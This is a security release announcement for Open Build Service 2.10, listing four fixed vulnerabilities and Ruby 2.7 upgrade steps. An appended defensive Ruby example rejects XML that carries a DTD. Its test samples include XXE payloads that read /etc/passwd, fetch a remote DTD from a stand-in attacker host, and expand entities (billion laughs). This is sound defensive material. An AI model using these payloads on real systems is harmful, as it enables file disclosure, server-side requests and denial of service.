Hey People,

this release fixes 4 security issues in 2.10 and you should update your installations as fast as possible.

## Fixed Issues

1. Fix XML external entity (XXE) injection with the xmlhash gem (CVE-2022-21949)

   One of the Ruby gems we are using to parse XML was susceptible to this kind of attack.

   https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Pr...

   This attack may lead to the disclosure of confidential data, denial of service, server-side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

2. Fix a privilege escalation issue in ProjectDoProjectReleaseJob

   https://github.com/openSUSE/open-build-service/pull/12407

   This has only minor impact, as an attacker would have to time the job scheduling exactly, which is next to impossible.

3. Fix heap memory corruption in the yajl-ruby gem

   For details see https://github.com/brianmario/yajl-ruby/security/advisories/GHSA-jj47-x69x-m...

4. Fix excessive backtracking in the nokogiri gem

   For details see https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-crjr-9rc5...

## Ruby 2.7

We have switched the Ruby interpreter to 2.7, which requires manual steps when updating from a previous OBS version via packages:

1) Change Passenger to use Ruby 2.7. Edit /etc/apache2/conf.d/mod_passenger.conf and set:

   PassengerRuby "/usr/bin/ruby.ruby2.7"

2) Set up the rake alternative if you have multiple rake versions installed:

   update-alternatives --set rake /usr/bin/rake.ruby.ruby2.7

3) Restart the apache2 service:

   systemctl restart apache2

## How to Update

Package updates are available from the 2.10 repositories:

https://build.opensuse.org/project/show/OBS:Server:2.10

Fixed appliances can be downloaded from http://openbuildservice.org/download

Henne

--
Henne Vogelsang
http://www.opensuse.org

Everybody has a plan, until they get hit.
 - Mike Tyson
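For the XXE item (1) in the list above, here is an added example of the defence-in-depth check a practitioner would put in front of any XML parser that handles untrusted input. It is not code from the OBS release or from the xmlhash gem: it refuses any document that carries a DTD at all, which is the vehicle for every XXE variant named on the OWASP page (file disclosure through SYSTEM entities, out-of-band requests through parameter entities, and entity-expansion denial of service). The sample documents, the `attacker.example` host and the request shape are constructed for this demonstration; the Hash conversion is a small stand-in written here, not the xmlhash gem's output format.

```ruby
require "rexml/document"

# Added example for the XXE item above; this is not code from the OBS release
# or from the xmlhash gem. It is a pre-parse guard that refuses any untrusted
# document carrying a DTD, which is the vehicle for external entities,
# out-of-band parameter entities and entity-expansion denial of service.
# All sample documents below are constructed for this demonstration; nothing
# here reads a file or opens a network connection.

class UntrustedDtdError < StandardError; end

# Return the reasons a document must not reach a DTD-aware parser, as symbols.
# The whole text is scanned, not just the prolog, so a declaration placed
# after a comment or after the root element is caught as well.
def dtd_findings(xml)
  findings = []
  findings << :doctype          if xml =~ /<!DOCTYPE\b/i
  findings << :parameter_entity if xml =~ /<!ENTITY\s+%/i
  findings << :external_entity  if xml =~ /<!ENTITY\b[^>]*\b(SYSTEM|PUBLIC)\b/i
  findings << :internal_entity  if xml =~ /<!ENTITY\s+\w+\s+["']/i
  findings
end

# Convert an element tree into nested Hashes, leaves becoming their text.
# This stand-in mirrors how application code sees a parsed request; it is
# not the xmlhash gem's output format.
def element_to_hash(el)
  children = el.elements.to_a
  return el.text.to_s.strip if children.empty?
  children.each_with_object({}) { |c, h| h[c.name] = element_to_hash(c) }
end

# Parse untrusted XML only after the guard passed. Raising before any parser
# sees the bytes makes the outcome independent of that parser's entity options.
def parse_untrusted(xml)
  findings = dtd_findings(xml)
  unless findings.empty?
    raise UntrustedDtdError, "refusing XML with #{findings.join(', ')}"
  end
  element_to_hash(REXML::Document.new(xml).root)
end

# Constructed samples; the hostname and path are placeholders.
XXE_FILE = <<~XML
  <?xml version="1.0"?>
  <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
  <foo>&xxe;</foo>
XML

XXE_OOB = <<~XML
  <?xml version="1.0"?>
  <!DOCTYPE data [
    <!ENTITY % remote SYSTEM "http://attacker.example/evil.dtd">
    %remote;
  ]>
  <data>x</data>
XML

BILLION_LAUGHS = <<~XML
  <?xml version="1.0"?>
  <!DOCTYPE lolz [
    <!ENTITY lol "lol">
    <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  ]>
  <lolz>&lol2;</lolz>
XML

BENIGN = <<~XML
  <?xml version="1.0"?>
  <request>
    <sourceproject>home:alice</sourceproject>
    <comment>ok</comment>
  </request>
XML

if $PROGRAM_NAME == __FILE__
  samples = { "xxe-file" => XXE_FILE, "xxe-oob" => XXE_OOB,
              "billion-laughs" => BILLION_LAUGHS, "benign" => BENIGN }
  samples.each do |name, xml|
    begin
      puts "#{name}: parsed #{parse_untrusted(xml).inspect}"
    rescue UntrustedDtdError => e
      puts "#{name}: #{e.message}"
    end
  end
end
```

The guard is deliberately parser-agnostic: whether the bytes would next go to xmlhash, Nokogiri or REXML, a document that needs a DTD has no business in an OBS API request, so rejecting it outright is simpler to audit than tuning entity options per parser. If you do rely on parser options, check them explicitly: Nokogiri's `Nokogiri::XML` defaults to RECOVER and NONET and leaves NOENT off, so external entities are only substituted if the application opts in, and the findings list this example returns is also a reasonable thing to log when a request is rejected.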